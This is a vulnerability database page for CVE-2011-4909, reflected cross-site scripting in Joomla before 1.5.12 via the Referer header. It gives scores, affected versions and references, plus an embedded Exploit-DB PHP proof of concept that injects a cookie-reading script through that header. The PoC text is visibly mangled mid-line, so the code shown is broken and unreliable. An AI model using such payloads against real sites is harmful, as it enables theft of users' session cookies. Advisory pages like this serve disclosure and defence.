CVE-2011-4909 : Detail

CVE-2011-4909

Cross-site Scripting
A03-Injection
6.19%V3
Network
2012-10-07
21h00 +00:00
2024-09-16
21h08 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple cross-site scripting (XSS) vulnerabilities in Joomla! before 1.5.12 allow remote attackers to inject arbitrary web script or HTML via the HTTP_REFERER header to (1) components/com_content/views/article/tmpl/form.php, (2) components/com_user/controller.php, (3) plugins/system/legacy/html.php, or (4) templates/beez/html/com_content/article/form.php.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 33061

Publication date : 2009-05-31 22h00 +00:00
Author : Juan Galiana Lara
EDB Verified : Yes

source: https://www.securityfocus.com/bid/35544/info Joomla! is prone to multiple cross-site scripting and information-disclosure vulnerabilities. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and obtain sensitive information. These issues affect versions prior to 1.5.12. /* PoC: XSS Joomla 1.5.11 Juan Galiana Lara Internet Security Auditors Jun 2009 */ /* config */ $site='localhost'; $path='/joomla-1.5.11'; $cookname='d85558a8cf943386aaa374896bfd3d99'; $cookvalue='4ab56fdd83bcad86289726aead602699'; class cURL { var $headers; var $user_agent; var $compression; var $cookie_file; var $proxy; /* evil script */ var $xss='alert("PWN PWN PWN: " + document.cookie);'; function cURL($cookies=TRUE,$cookie='cookies.txt',$compression='gzip',$proxy='') { $this->headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'; $this->headers[] = 'Connection: Keep-Alive'; $this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8'; $this->headers[] = 'Referer: ">get('http://' . $site . $path . '/index.php?option=com_content&view=article&layout=form'); /* let's execute some javascript.. }:-)*/ echo $c; ?>

Products Mentioned

Configuraton 0

Joomla>>Joomla\! >> Version To (including) 1.5.11

Joomla>>Joomla\! >> Version 1.5.0

Joomla>>Joomla\! >> Version 1.5.1

Joomla>>Joomla\! >> Version 1.5.2

Joomla>>Joomla\! >> Version 1.5.3

Joomla>>Joomla\! >> Version 1.5.4

Joomla>>Joomla\! >> Version 1.5.5

Joomla>>Joomla\! >> Version 1.5.6

Joomla>>Joomla\! >> Version 1.5.7

Joomla>>Joomla\! >> Version 1.5.8

Joomla>>Joomla\! >> Version 1.5.9

Joomla>>Joomla\! >> Version 1.5.10

References

http://www.osvdb.org/55589
Tags : vdb-entry, x_refsource_OSVDB
http://secunia.com/advisories/35668
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.openwall.com/lists/oss-security/2011/12/25/8
Tags : mailing-list, x_refsource_MLIST
http://www.securityfocus.com/bid/35544
Tags : vdb-entry, x_refsource_BID
http://www.openwall.com/lists/oss-security/2011/12/25/3
Tags : mailing-list, x_refsource_MLIST